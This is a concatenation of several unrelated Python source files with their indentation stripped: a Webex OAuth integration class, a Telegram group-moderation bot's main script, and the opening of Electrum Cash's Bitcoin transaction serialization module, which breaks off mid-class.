Start an HTTP server on the given port on the local machine.
%s -g
Pop up a graphical interface for finding and serving documentation.
%s -w <name> ...
Write out the HTML documentation for a module to a file in the current
directory. If <name> contains a '%s', it is treated as a filename; if
it names a directory, documentation is written for all the contents.
""" % (cmd, os.sep, cmd, cmd, cmd, cmd, os.sep)
if __name__ == '__main__': cli()
|
__init__.py
|
"""
An OAuth integration
"""
import concurrent.futures
import http.server
import logging
import socketserver
import threading
import urllib.parse
import uuid
import webbrowser
from collections.abc import Callable
from dataclasses import dataclass
from typing import Union, Optional
import requests
from ..rest import dump_response
from ..tokens import Tokens
log = logging.getLogger(__name__)
__all__ = ['Integration']
@dataclass(init=False)
class Integration:
"""
An OAuth integration
"""
#: integration's client id, obtained from developer.webex.com
client_id: str
#: integration's client secret, obtained from developer.webex.com
client_secret: str
#: OAuth scopes of the integration.
scopes: list[str]
#: redirect URL of the integration
redirect_url: str
#: URL of the authorization service; used as part of the URL to start an OAuth flow
auth_service: str
#: base URL of the access token service
token_service: str
def __init__(self, *, client_id: str, client_secret: str, scopes: Union[str, list[str]],
redirect_url: str,
auth_service: str = None,
token_service: str = None):
"""
:param client_id: integration's client id, obtained from developer.webex.com
:param client_secret: integration's client secret, obtained from developer.webex.com
:param scopes: integration's scopes. Can be a list of strings or a string containing a list of space
separated scopes
:param redirect_url: integration's redirect URL
:param auth_service: authorization service to be used in the authorization URL.
Default: 'https://webexapis.com/v1/authorize'
:param token_service: URL of token service to use to obtain tokens from.
Default: 'https://webexapis.com/v1/access_token'
"""
self.client_id = client_id
self.client_secret = client_secret
if isinstance(scopes, list):
self.scopes = scopes
else:
scopes: str
self.scopes = scopes.split()
self.redirect_url = redirect_url
self.auth_service = auth_service or 'https://webexapis.com/v1/authorize'
self.token_service = token_service or 'https://webexapis.com/v1/access_token'
def auth_url(self, *, state: str) -> str:
"""
Get the URL to start an OAuth flow for the integration
:param state: state in redirect URL
:type state: str
:return: URL to start the OAuth flow
:rtype: str
"""
scopes = self.scopes
if isinstance(scopes, list):
scopes = ' '.join(scopes)
params = {
'client_id': self.client_id,
'response_type': 'code',
'redirect_uri': self.redirect_url,
'scope': scopes,
'state': state
}
full_url = f'{self.auth_service}?{urllib.parse.urlencode(params)}'
return full_url
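# Illustrative sketch (not part of the library): building an authorization URL.
# The client id, secret, scopes and redirect URL below are placeholder values.
#
#     integration = Integration(client_id='C123', client_secret='secret',
#                               scopes='scope-a scope-b',
#                               redirect_url='http://localhost:6001/redirect')
#     url = integration.auth_url(state='some-opaque-state')
#     # direct the user's browser to `url`; the auth service redirects back
#     # to the redirect URL with ?code=...&state=... query parameters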
def tokens_from_code(self, *, code: str) -> Tokens:
"""
Get a new set of tokens from code at end of OAuth flow
:param code: code obtained at end of SAML 2.0 OAuth flow
:type code: str
:return: new tokens
:rtype: Tokens
"""
url = self.token_service
data = {
'grant_type': 'authorization_code',
'client_id': self.client_id,
'client_secret': self.client_secret,
'code': code,
'redirect_uri': self.redirect_url
}
with requests.Session() as session:
response = session.post(url=url, data=data)
dump_response(response, dump_log=log)
response.raise_for_status()
json_data = response.json()
tokens = Tokens.parse_obj(json_data)
tokens.set_expiration()
return tokens
def refresh(self, *, tokens: Tokens):
"""
Try to get a new access token using the refresh token.
:param tokens: Tokens. Access token and expirations get updated in place.
:raise:
:class:`requests.HTTPError`: if request to obtain new access token fails
"""
data = {
'grant_type': 'refresh_token',
'client_id': self.client_id,
'client_secret': self.client_secret,
'refresh_token': tokens.refresh_token
}
try:
url = self.token_service
with requests.Session() as session:
with session.post(url=url, data=data) as response:
dump_response(response=response, dump_log=log)
response.raise_for_status()
json_data = response.json()
except requests.HTTPError:
tokens.access_token = None
raise
else:
new_tokens = Tokens.parse_obj(json_data)
new_tokens: Tokens
new_tokens.set_expiration()
tokens.update(new_tokens)
def validate_tokens(self, *, tokens: Tokens, min_lifetime_seconds: int = 300) -> bool:
"""
Validate tokens
If the remaining lifetime is too small then try to get a new access token
using the existing refresh token.
If no new access token can be obtained using the refresh token then the access token is set to None
and True is returned
:param tokens: current OAuth tokens. Get updated if new tokens are created
:type tokens: Tokens
:param min_lifetime_seconds: minimal remaining lifetime in seconds. Default: 300 seconds
:type min_lifetime_seconds: int
:return: True if the minimal lifetime was reached and a token refresh was attempted, else False.
:rtype: bool
"""
if tokens.remaining >= min_lifetime_seconds:
return False
log.debug(f'Getting new access token, valid until {tokens.expires_at}, remaining {tokens.remaining}')
try:
self.refresh(tokens=tokens)
except requests.HTTPError:
# ignore HTTPErrors
pass
return True
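# Illustrative sketch (assumes `tokens` is an existing wxc_sdk.tokens.Tokens instance
# and `integration` an Integration):
#
#     if integration.validate_tokens(tokens=tokens):
#         pass  # a refresh was attempted; persist the (possibly updated) tokens
#     if not tokens.access_token:
#         tokens = integration.get_tokens_from_oauth_flow()  # refresh failed, re-authorize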
def get_tokens_from_oauth_flow(self) -> Optional[Tokens]:
"""
Initiate an OAuth flow to obtain new tokens.
Start a local web server on port 6001 to serve the last step of the OAuth flow.
:param self: Integration to use for the flow
:type: :class:`wxc_sdk.integration.Integration`
:return: set of new tokens if successful, else None
:rtype: :class:`wxc_sdk.tokens.Tokens`
"""
def serve_redirect():
"""
Temporarily start a web server to serve the redirect URI at http://localhost:6001/redirect
:return: parsed query of the GET on the redirect URI
"""
# mutable to hold the query result
oauth_response = dict()
class RedirectRequestHandler(http.server.BaseHTTPRequestHandler):
# handle the GET request on the redirect URI
# noinspection PyPep8Naming
def do_GET(self):
# serve exactly one GET on the redirect URI and then we are done
parsed = urllib.parse.urlparse(self.path)
if parsed.path == '/redirect':
log.debug('serve_redirect: got GET on /redirect')
query = urllib.parse.parse_qs(parsed.query)
oauth_response['query'] = query
# we are done
self.shutdown(self.server)
self.send_response(200)
self.flush_headers()
@staticmethod
def shutdown(server: socketserver.BaseServer):
log.debug('serve_redirect: shutdown of local web server requested')
threading.Thread(target=server.shutdown, daemon=True).start()
httpd = http.server.HTTPServer(server_address=('', 6001),
RequestHandlerClass=RedirectRequestHandler)
log.debug('serve_redirect: starting local web server for redirect URI')
httpd.serve_forever()
httpd.server_close()
log.debug(f'serve_redirect: server terminated, result {oauth_response["query"]}')
return oauth_response['query']
state = str(uuid.uuid4())
auth_url = self.auth_url(state=state)
with concurrent.futures.ThreadPoolExecutor() as executor:
# start web server
fut = executor.submit(serve_redirect)
# open authentication URL in local webbrowser
webbrowser.open(auth_url)
# wait for GET on redirect URI and get the result (parsed query of redirect URI)
try:
result = fut.result(timeout=120)
except concurrent.futures.TimeoutError:
try:
# post a dummy response to the redirect URI to stop the server
with requests.Session() as session:
session.get(self.redirect_url, params={'code': 'foo'})
except Exception:
pass
log.warning('Authorization did not finish in time (120 seconds)')
return
code = result['code'][0]
response_state = result['state'][0]
assert response_state == state
# get access tokens
new_tokens = self.tokens_from_code(code=code)
if new_tokens is None:
log.error('Failed to obtain tokens')
return None
return new_tokens
def get_cached_tokens(self, *, read_from_cache: Callable[[], Optional[Tokens]],
write_to_cache: Callable[[Tokens], None]) -> Optional[Tokens]:
"""
Get tokens.
Tokens are read from cache and then verified. If needed an OAuth flow is initiated to get a new
set of tokens. For this the redirect URL http://localhost:6001/redirect is expected.
:param read_from_cache: callback to read tokens from cache. Called without parameters and is expected to return
a :class:`wxc_sdk.tokens.Tokens` instance with the cached tokens. If cached tokens cannot be provided then
None should be returned.
:param write_to_cache: callback to write updated tokens back to cache. The callback is called with a
:class:`wxc_sdk.tokens.Tokens` instance as only argument.
:return: set of tokens or None
:rtype: :class:`wxc_sdk.tokens.Tokens`
"""
# read tokens from cache
tokens = read_from_cache()
if tokens:
# validate tokens
changed = self.validate_tokens(tokens=tokens)
if not tokens.access_token:
tokens = None
elif changed:
write_to_cache(tokens)
if not tokens:
# get new tokens via integration if needed
tokens = self.get_tokens_from_oauth_flow()
if tokens:
tokens.set_expiration()
write_to_cache(tokens)
return tokens
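# Illustrative sketch (not part of the library): file-backed cache callbacks for
# get_cached_tokens(). The file name and JSON layout are assumptions for the example;
# Tokens is assumed to be a pydantic model (parse_obj is used above).
#
#     import json, os
#
#     def read_tokens():
#         if not os.path.isfile('tokens.json'):
#             return None
#         with open('tokens.json') as f:
#             return Tokens.parse_obj(json.load(f))
#
#     def write_tokens(tokens: Tokens):
#         with open('tokens.json', 'w') as f:
#             json.dump(json.loads(tokens.json()), f)
#
#     tokens = integration.get_cached_tokens(read_from_cache=read_tokens,
#                                            write_to_cache=write_tokens)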
|
main.py
|
#from modules import *
#from modules.core import *
from config import *
import modules.core.database as database
import modules.core.welcome as welcome
#import modules.core.extract as extract
import modules.core.filter as filter
import modules.core.unparse as unparse
import modules.delete as delete
import modules.core.note as note
import modules.core.rule as rule
import modules.core.warn as warn
import modules.core.ban as ban
import modules.core.edit as edit
import modules.core.extract as extract
import modules.core.fun as fun
import modules.core.help as help
import modules.core.system as system
import modules.extras as extras
from telegram import Message, Chat, Update, Bot, User, ChatMember
from telegram import ParseMode, InlineKeyboardMarkup, InlineKeyboardButton, ReplyKeyboardMarkup
from telegram.error import Unauthorized, BadRequest, TimedOut, NetworkError, ChatMigrated, TelegramError
from telegram.ext import Updater, CommandHandler, MessageHandler, Filters, CallbackQueryHandler, CallbackContext
from telegram.utils.helpers import escape_markdown
import logging
from mysql import connector
import time
import sys
import os
import threading
from tg_bot.scripts.modules.core.fun import fbi_joke
"""
import concurrent.futures
from concurrent.futures import ProcessPoolExecutor
import multiprocessing
import threading"""
print("imoprted modules")
# Bot Logging & Debugging
platform = sys.platform
path = str(os.path.dirname(os.path.dirname(sys.argv[0])))
stdoutOrigin = sys.stdout
deb = 1 # switch to 1 when debugging, to prevent log file creation
if platform == "linux" or platform == "linux2" or platform == "darwin":
sys.stderr = open(path+"/../logs/log_bot_runtime.log", 'w')
elif platform == "win32":
wp = path + '\\logs\\log_bot_runtime.log'
filename = os.path.join(wp)
if deb == 0:
logging.basicConfig(filename=filename,
filemode='a',
format='%(asctime)s %(levelname)s %(name)s %(message)s',
level=logging.DEBUG)
#sys.stdout = open(wp, 'w')
sys.stderr = open(wp, 'w')
else:
logging.basicConfig(
format='%(asctime)s %(levelname)s %(name)s %(message)s',
level=logging.DEBUG)
logger = logging.getLogger(__name__)
class writer(object):
log = []
def write(self, data):
self.log.append(data)
print("logging")
# Bot Authentication
print("authenticating")
updater = Updater(bot_token, use_context=True)
dp = updater.dispatcher
# Initialize Database & Cursor
botdb = None
def load():
global botdb
db = connector.connect(
host=database_host,
user=database_user,
password=database_password)
cursor = db.cursor(buffered=True)
sql = "CREATE DATABASE IF NOT EXISTS {s0}".format(s0=database_name)
cursor.execute(sql)
db = connector.connect(
host=database_host,
user=database_user,
password=database_password,
database=database_name)
cursor = db.cursor(buffered=True)
create_db = database.create_db().create_base()
#del create_db
botdb = database.bot_db()
load()
print("database loaded")
def unparse_func(update, context): # Unparse Incoming Responses
start = time.process_time()
# user_status = context.bot.get_chat_member(chat['id'], user['id'])
# print(user_status['status'])
# print(chatmember)
# print(eval(str(context.bot.getChat(chat['id']).permissions)))
threading.Thread(target=unparse.filter, args=(update,context), daemon=True).start()
print("\n", time.process_time() - start, "\n")
def button(update: Update, context: CallbackContext):
start = time.process_time()
query = update.callback_query
func = query.data.split(' ', 1)[0]
# print("\n", query.message.reply_markup, "\n")
# print("\n", query.message.reply_to_message.from_user, "\n")
# print("\n", query.data, "\n")
# print("\n", query.from_user, "\n")
# query.answer(text='you chose dog!', show_alert=True)
# full_msg = query.message.reply_to_message
if func == "veri":
but_veri(update,context) # try with later **locals()
print("\n", time.process_time() - start, "\n")
def but_veri(update: Update, context: CallbackContext):
query = update.callback_query
user = query.from_user
# print(user)
user_id = user.id
# print("\n", msg.new_chat_members[0].id)
# print(msg.from_user.id)
# print(user_id, "\n")
data = query.data.split(' ', 2)
msg = query.message.reply_to_message
if user_id == msg.new_chat_members[0].id:
chat = msg.chat
chat_id = chat.id
query.answer()
#text = query.data[2]
query.edit_message_text(text=data[2])
if data[1] == '0':
ban.ban_cls(update,context).unmute()
database.add_link(chat=chat, user=user, replace=1)
# user_status = context.bot.get_chat_member(chat_id, user_id)
# print(user_status['status'])
else:
query.answer(
text='You are already verified, This button is not for you !')
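# Note: the inline-button callback data parsed above is expected to have the form
# "veri <flag> <text>" (split on the first two spaces), e.g. "veri 0 Verified!";
# flag '0' unmutes the new member and records the link, and <text> replaces the
# verification message.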
def start(update,context):
res = update.message.text.split(None,1)
try:
sub = res[1]
if sub == "start":
text = "This is " + bot_name + " & I am a telegram handler bot being developed with @jesvi_bot 's source code to provide users with a better UX experience... \n\nAdd me in a group and you can get started to use my features.\n\n" +\
"You can check out for my source/feature updates at @bot_garage_channel\n\nUse /help for more info about available commands & its uses.."
update.message.reply_text(text)
elif sub == "help":
help.help(update,context)
elif sub == "rules":
rule.rule_router(update,context)
elif sub == "set":
pass
elif sub == "note":
pass
elif sub.startswith('-'):
rule.rule_router(update,context)
except:
text = "This is " + bot_name + " & I am a telegram handler bot being developed with @jesvi_bot 's source code to provide users with a better UX experience... \n\nAdd me in a group and you can get started to use my features.\n\n" +\
"You can check out for my source/feature updates at @bot_garage_channel\n\nUse /help for more info about available commands & its uses.."
update.message.reply_text(text)
def main(): # Main Function
print("started")
uptime = str(time.strftime("%Y-%m-%d (%H:%M:%S)"))
if deb == 0:
logger = writer()
sys.stdout = logger
sys.stderr = logger
dp.bot.send_message(chat_id=owner_id, text="<code>Started Service !\n\nTime : " +
uptime + "</code>", parse_mode="HTML")
start_cmd = ("start", "about")
dp.add_handler(CommandHandler(start_cmd, start))
dp.add_handler(MessageHandler(
Filters.status_update.new_chat_members, welcome.gate))
dp.add_handler(MessageHandler(
Filters.status_update.left_chat_member, welcome.farewell))
delete_cmd = ("del", "purge", "sdel")
dp.add_handler(CommandHandler(delete_cmd, delete.delete_router))
filter_cmd = ("lock", "unlock", "filter", "filteradd", "filterdel")
dp.add_handler(CommandHandler(filter_cmd, filter.filter_router))
notes_cmd = ("notes", "noteadd", "notedel")
dp.add_handler(CommandHandler(notes_cmd, note.note_router))
warn_cmd = ("warn", "warninfo", "warnclear", "warnremove")
dp.add_handler(CommandHandler(warn_cmd, warn.warn_router))
ban_cmd = ("ban", "unban", "kick", "mute", "unmute","leave", "rip")
dp.add_handler(CommandHandler(ban_cmd, ban.thread_ban))
rule_cmd = ("rules", "rule","ruleset", "ruledel")
dp.add_handler(CommandHandler(rule_cmd, rule.rule_router))
extras_cmd = ("search")
dp.add_handler(CommandHandler(extras_cmd, extras.extras_threading))
system_cmd = ("net", "sql", "system", "cmd", "server", "publish")
dp.add_handler(CommandHandler(system_cmd, system.system_threading))
dp.add_handler(CommandHandler("scoot", quit_))
fun_cmd = ("boom")
dp.add_handler(CommandHandler(fun_cmd, fun.boom))
fun_cmd = ("oof")
dp.add_handler(CommandHandler(fun_cmd, fun.oof))
fun_cmd = ("fbi")
dp.add_handler(CommandHandler(fun_cmd, fun.fbi_joke))
help_cmd = ("help")
dp.add_handler(CommandHandler(help_cmd, help.help))
edit_cmd = ("promote", "demote", "pin", "unpin", "bio", "bioset", "biodel", "descset", "nickset", "titleset")
dp.add_handler(CommandHandler(edit_cmd, edit.edit_router))
info_cmd = ("info", "group", "msgid", "json", "sync")
dp.add_handler(CommandHandler(info_cmd, unparse.thread_unparse))
dp.add_handler(CallbackQueryHandler(button))
dp.add_handler(MessageHandler(Filters.all, unparse_func))
#dp.add_handler(MessageHandler(Filters.all, unparse.thread_unparse))
updater.start_polling()
updater.idle()
def quit_(update,context):
m = extract.sudo_check_2(msg=update.message,del_lvl=7,context=context,sudo=1)
if m == 7:
pass
else: return
context.bot.send_message(chat_id=update.message['chat']["id"],text="Terminating !" ,
parse_mode="HTML")
updater.stop()
exit(1)
system.exit(1)
return
if __name__ == '__main__':
main()
#new stuff for sub-main 2
|
transaction.py
|
#!/usr/bin/env python3
#
# Electrum - lightweight Bitcoin client
# Copyright (C) 2011 Thomas Voegtlin
#
# Permission is hereby granted, free of charge, to any person
# obtaining a copy of this software and associated documentation files
# (the "Software"), to deal in the Software without restriction,
# including without limitation the rights to use, copy, modify, merge,
# publish, distribute, sublicense, and/or sell copies of the Software,
# and to permit persons to whom the Software is furnished to do so,
# subject to the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS
# BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN
# ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN
# CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
# Note: The deserialization code originally comes from ABE.
from .util import print_error, profiler
from .caches import ExpiringCache
from .bitcoin import *
from .address import (PublicKey, Address, Script, ScriptOutput, hash160,
UnknownAddress, OpCodes as opcodes,
P2PKH_prefix, P2PKH_suffix, P2SH_prefix, P2SH_suffix)
from . import schnorr
from . import util
import struct
import warnings
#
# Workalike python implementation of Bitcoin's CDataStream class.
#
from .keystore import xpubkey_to_address, xpubkey_to_pubkey
NO_SIGNATURE = 'ff'
class SerializationError(Exception):
""" Thrown when there's a problem deserializing or serializing """
class InputValueMissing(ValueError):
""" thrown when the value of an input is needed but not present """
class BCDataStream(object):
def __init__(self):
self.input = None
self.read_cursor = 0
def clear(self):
self.input = None
self.read_cursor = 0
def write(self, _bytes): # Initialize with string of _bytes
if self.input is None:
self.input = bytearray(_bytes)
else:
self.input += bytearray(_bytes)
def read_string(self, encoding='ascii'):
# Strings are encoded depending on length:
# 0 to 252 : 1-byte-length followed by bytes (if any)
# 253 to 65,535 : byte '253' 2-byte-length followed by bytes
# 65,536 to 4,294,967,295 : byte '254' 4-byte-length followed by bytes
# ... and the Bitcoin client is coded to understand:
# greater than 4,294,967,295 : byte '255' 8-byte-length followed by bytes of string
# ... but I don't think it actually handles any strings that big.
if self.input is None:
raise SerializationError("call write(bytes) before trying to deserialize")
length = self.read_compact_size()
return self.read_bytes(length).decode(encoding)
def write_string(self, string, encoding='ascii'):
string = to_bytes(string, encoding)
# Length-encoded as with read-string
self.write_compact_size(len(string))
self.write(string)
def read_bytes(self, length):
try:
result = self.input[self.read_cursor:self.read_cursor+length]
self.read_cursor += length
return result
except IndexError:
raise SerializationError("attempt to read past end of buffer")
return ''
def can_read_more(self) -> bool:
if not self.input:
return False
return self.read_cursor < len(self.input)
def read_boolean(self): return self.read_bytes(1)[0] != 0  # indexing bytes yields an int in Python 3
def read_int16(self): return self._read_num('<h')
def read_uint16(self): return self._read_num('<H')
def read_int32(self): return self._read_num('<i')
def read_uint32(self): return self._read_num('<I')
def read_int64(self): return self._read_num('<q')
def read_uint64(self): return self._read_num('<Q')
def write_boolean(self, val): return self.write(b'\x01' if val else b'\x00')
def write_int16(self, val): return self._write_num('<h', val)
def write_uint16(self, val): return self._write_num('<H', val)
def write_int32(self, val): return self._write_num('<i', val)
def write_uint32(self, val): return self._write_num('<I', val)
def write_int64(self, val): return self._write_num('<q', val)
def write_uint64(self, val): return self._write_num('<Q', val)
def read_compact_size(self):
try:
size = self.input[self.read_cursor]
self.read_cursor += 1
if size == 253:
size = self._read_num('<H')
elif size == 254:
size = self._read_num('<I')
elif size == 255:
size = self._read_num('<Q')
return size
except IndexError:
raise SerializationError("attempt to read past end of buffer")
def write_compact_size(self, size):
if size < 0:
raise SerializationError("attempt to write size < 0")
elif size < 253:
self.write(bytes([size]))
elif size < 2**16:
self.write(b'\xfd')
self._write_num('<H', size)
elif size < 2**32:
self.write(b'\xfe')
self._write_num('<I', size)
elif size < 2**64:
self.write(b'\xff')
self._write_num('<Q', size)
def _read_num(self, format):
try:
(i,) = struct.unpack_from(format, self.input, self.read_cursor)
self.read_cursor += struct.calcsize(format)
except Exception as e:
raise SerializationError(e)
return i
def _write_num(self, format, num):
s = struct.pack(format, num)
self.write(s)
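# Illustrative sketch (not part of the upstream code): the variable-length
# "compact size" encoding used above, shown via a round trip through BCDataStream.
#
#     s = BCDataStream()
#     s.write_compact_size(252)      # -> b'\xfc'                 (single byte)
#     s.write_compact_size(253)      # -> b'\xfd\xfd\x00'         (0xfd + 2-byte LE)
#     s.write_compact_size(70000)    # -> b'\xfe\x70\x11\x01\x00' (0xfe + 4-byte LE)
#     r = BCDataStream(); r.write(bytes(s.input))
#     assert [r.read_compact_size() for _ in range(3)] == [252, 253, 70000]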
# This function comes from bitcointools, bct-LICENSE.txt.
def long_hex(bytes):
return bytes.hex()  # the 'hex_codec' str codec is not available on bytes in Python 3
# This function comes from bitcointools, bct-LICENSE.txt.
def short_hex(bytes):
t = bytes.hex()
if len(t) < 11:
return t
return t[0:4]+"..."+t[-4:]
def match_decoded(decoded, to_match):
if len(decoded) != len(to_match):
return False
for i in range(len(decoded)):
op = decoded[i][0]
if to_match[i] == opcodes.OP_PUSHDATA4 and op <= opcodes.OP_PUSHDATA4 and op > 0:
# Opcodes below OP_PUSHDATA4 just push data onto stack, and are equivalent.
# Note we explicitly don't match OP_0, OP_1 through OP_16 and OP_1NEGATE here
continue
if to_match[i] != op:
return False
return True
def parse_sig(x_sig):
return [None if x == NO_SIGNATURE else x for x in x_sig]
def safe_parse_pubkey(x):
try:
return xpubkey_to_pubkey(x)
except:
return x
def parse_scriptSig(d, _bytes):
try:
decoded = Script.get_ops(_bytes)
except Exception as e:
# coinbase transactions raise an exception
print_error("cannot find address in input script", bh2u(_bytes))
return
match = [ opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
item = decoded[0][1]
# payto_pubkey
d['type'] = 'p2pk'
d['signatures'] = [bh2u(item)]
d['num_sig'] = 1
d['x_pubkeys'] = ["(pubkey)"]
d['pubkeys'] = ["(pubkey)"]
return
# non-generated TxIn transactions push a signature
# (seventy-something bytes) and then their public key
# (65 bytes) onto the stack:
match = [ opcodes.OP_PUSHDATA4, opcodes.OP_PUSHDATA4 ]
if match_decoded(decoded, match):
sig = bh2u(decoded[0][1])
x_pubkey = bh2u(decoded[1][1])
try:
signatures = parse_sig([sig])
pubkey, address = xpubkey_to_address(x_pubkey)
except:
print_error("cannot find address in input script", bh2u(_bytes))
return
d['type'] = 'p2pkh'
d['signatures'] = signatures
d['x_pubkeys'] = [x_pubkey]
d['num_sig'] = 1
d['pubkeys'] = [pubkey]
d['address'] = address
return
# p2sh transaction, m of n
match = [ opcodes.OP_0 ] + [ opcodes.OP_PUSHDATA4 ] * (len(decoded) - 1)
if not match_decoded(decoded, match):
print_error("cannot find address in input script", bh2u(_bytes))
return
x_sig = [bh2u(x[1]) for x in decoded[1:-1]]
m, n, x_pubkeys, pubkeys, redeemScript = parse_redeemScript(decoded[-1][1])
# write result in d
d['type'] = 'p2sh'
d['num_sig'] = m
d['signatures'] = parse_sig(x_sig)
d['x_pubkeys'] = x_pubkeys
d['pubkeys'] = pubkeys
d['redeemScript'] = redeemScript
d['address'] = Address.from_P2SH_hash(hash160(redeemScript))
def parse_redeemScript(s):
dec2 = Script.get_ops(s)
# the following throws an exception when the redeemScript has one or zero opcodes
m = dec2[0][0] - opcodes.OP_1 + 1
n = dec2[-2][0] - opcodes.OP_1 + 1
op_m = opcodes.OP_1 + m - 1
op_n = opcodes.OP_1 + n - 1
match_multisig = [ op_m ] + [opcodes.OP_PUSHDATA4]*n + [ op_n, opcodes.OP_CHECKMULTISIG ]
if not match_decoded(dec2, match_multisig):
# causes exception in caller when mismatched
print_error("cannot find address in input script", bh2u(s))
return
x_pubkeys = [bh2u(x[1]) for x in dec2[1:-2]]
pubkeys = [safe_parse_pubkey(x) for x in x_pubkeys]
redeemScript = Script.multisig_script(m, [bytes.fromhex(p)
for p in pubkeys])
return m, n, x_pubkeys, pubkeys, redeemScript
def get_address_from_output_script(_bytes):
scriptlen = len(_bytes)
if scriptlen == 23 and _bytes.startswith(P2SH_prefix) and _bytes.endswith(P2SH_suffix):
# Pay-to-script-hash
return TYPE_ADDRESS, Address.from_P2SH_hash(_bytes[2:22])
if scriptlen == 25 and _bytes.startswith(P2PKH_prefix) and _bytes.endswith(P2PKH_suffix):
# Pay-to-pubkey-hash
return TYPE_ADDRESS, Address.from_P2PKH_hash(_bytes[3:23])
if scriptlen == 35 and _bytes[0] == 33 and _bytes[1] in (2,3) and _bytes[34] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (compressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:34])
if scriptlen == 67 and _bytes[0] == 65 and _bytes[1] == 4 and _bytes[66] == opcodes.OP_CHECKSIG:
# Pay-to-pubkey (uncompressed)
return TYPE_PUBKEY, PublicKey.from_pubkey(_bytes[1:66])
# note: we don't recognize bare multisigs.
return TYPE_SCRIPT, ScriptOutput.protocol_factory(bytes(_bytes))
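# For reference, the standard output script layouts matched above (total byte counts
# in parentheses):
#   P2SH  (23 bytes): OP_HASH160 <push 20> <20-byte script hash> OP_EQUAL
#   P2PKH (25 bytes): OP_DUP OP_HASH160 <push 20> <20-byte pubkey hash> OP_EQUALVERIFY OP_CHECKSIG
#   P2PK  (35 bytes): <push 33> <33-byte compressed pubkey> OP_CHECKSIG
#   P2PK  (67 bytes): <push 65> <65-byte uncompressed pubkey> OP_CHECKSIG
# Anything else falls through to ScriptOutput.protocol_factory.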
def parse_input(vds):
d = {}
prevout_hash = hash_encode(vds.read_bytes(32))
prevout_n = vds.read_uint32()
scriptSig = vds.read_bytes(vds.read_compact_size())
sequence = vds.read_uint32()
d['prevout_hash'] = prevout_hash
d['prevout_n'] = prevout_n
d['sequence'] = sequence
d['address'] = UnknownAddress()
if prevout_hash == '00'*32:
d['type'] = 'coinbase'
d['scriptSig'] = bh2u(scriptSig)
else:
d['x_pubkeys'] = []
d['pubkeys'] = []
d['signatures'] = {}
d['address'] = None
d['type'] = 'unknown'
d['num_sig'] = 0
d['scriptSig'] = bh2u(scriptSig)
try:
parse_scriptSig(d, scriptSig)
except Exception as e:
print_error('{}: Failed to parse tx input {}:{}, probably a p2sh (non multisig?). Exception was: {}'.format(__name__, prevout_hash, prevout_n, repr(e)))
# that whole heuristic codepath is fragile; just ignore it when it dies.
# failing tx examples:
# 1c671eb25a20aaff28b2fa4254003c201155b54c73ac7cf9c309d835deed85ee
# 08e1026eaf044127d7103415570afd564dfac3131d7a5e4b645f591cd349bb2c
# override these once more just to make sure
d['address'] = UnknownAddress()
d['type'] = 'unknown'
if not Transaction.is_txin_complete(d):
del d['scriptSig']
d['value'] = vds.read_uint64()
return d
def parse_output(vds, i):
d = {}
d['value'] = vds.read_int64()
scriptPubKey = vds.read_bytes(vds.read_compact_size())
d['type'], d['address'] = get_address_from_output_script(scriptPubKey)
d['scriptPubKey'] = bh2u(scriptPubKey)
d['prevout_n'] = i
return d
def deserialize(raw):
vds = BCDataStream()
vds.write(bfh(raw))
d = {}
start = vds.read_cursor
d['version'] = vds.read_int32()
n_vin = vds.read_compact_size()
d['inputs'] = [parse_input(vds) for i in range(n_vin)]
n_vout = vds.read_compact_size()
d['outputs'] = [parse_output(vds, i) for i in range(n_vout)]
d['lockTime'] = vds.read_uint32()
if vds.can_read_more():
raise SerializationError('extra junk at the end')
return d
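# Illustrative sketch (assumes `raw_hex` holds a complete hex-encoded transaction):
#
#     d = deserialize(raw_hex)
#     print(d['version'], d['lockTime'])
#     for inp in d['inputs']:
#         print(inp['prevout_hash'], inp['prevout_n'], inp['type'])
#     for out in d['outputs']:
#         print(out['address'], out['value'])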
# pay & redeem scripts
def multisig_script(public_keys, m):
n = len(public_keys)
assert n <= 15
assert m <= n
op_m = push_script_bytes(bytes([m])).hex()
op_n = push_script_bytes(bytes([n])).hex()
keylist = [push_script(k) for k in public_keys]
return op_m + ''.join(keylist) + op_n + bytes([opcodes.OP_CHECKMULTISIG]).hex()
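# Illustrative sketch: a 2-of-3 redeem script. `pk1_hex`..`pk3_hex` would be three
# hex-encoded public keys (placeholders here); under minimal-push rules the result
# corresponds to OP_2 <pk1> <pk2> <pk3> OP_3 OP_CHECKMULTISIG.
#
#     redeem_hex = multisig_script([pk1_hex, pk2_hex, pk3_hex], 2)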
class Transaction:
SIGHASH_FORKID = 0x40 # do not use this; deprecated
FORKID = 0x000000 # do not use this; deprecated
def __str__(self):
if self.raw is None:
self.raw = self.serialize()
return self.raw
def __init__(self, raw, sign_schnorr=False):
if raw is None:
self.raw = None
elif isinstance(raw, str):
self.raw = raw.strip() if raw else None
elif isinstance(raw, dict):
self.raw = raw['hex']
else:
raise BaseException("cannot initialize transaction", raw)
self._inputs = None
self._outputs = None
self.locktime = 0
self.version = 1
self._sign_schnorr = sign_schnorr
# attribute used by HW wallets to tell the hw keystore about any outputs
# in the tx that are to self (change), etc. See wallet.py add_hw_info
# which writes to this dict and the various hw wallet plugins which
# read this dict.
self.output_info = dict()
# Ephemeral meta-data used internally to keep track of interesting
# things. This is currently written-to by coinchooser to tell UI code
# about 'dust_to_fee', which is change that's too small to go to change
# outputs (below dust threshold) and needed to go to the fee.
#
# It is also used to store the 'fetched_inputs' which are asynchronously
# retrieved inputs (by retrieving prevout_hash tx's), see
#`fetch_input_data`.
#
# Values in this dict are advisory only and may or may not always be
# there!
self.ephemeral = dict()
def is_memory_compact(self):
"""Returns True if the tx is stored in memory only as self.raw (serialized) and has no deserialized data
structures currently in memory. """
return (self.raw is not None
and self._inputs is None and self._outputs is None and self.locktime == 0 and self.version == 1)
def set_sign_schnorr(self, b):
self._sign_schnorr = b
def update(self, raw):
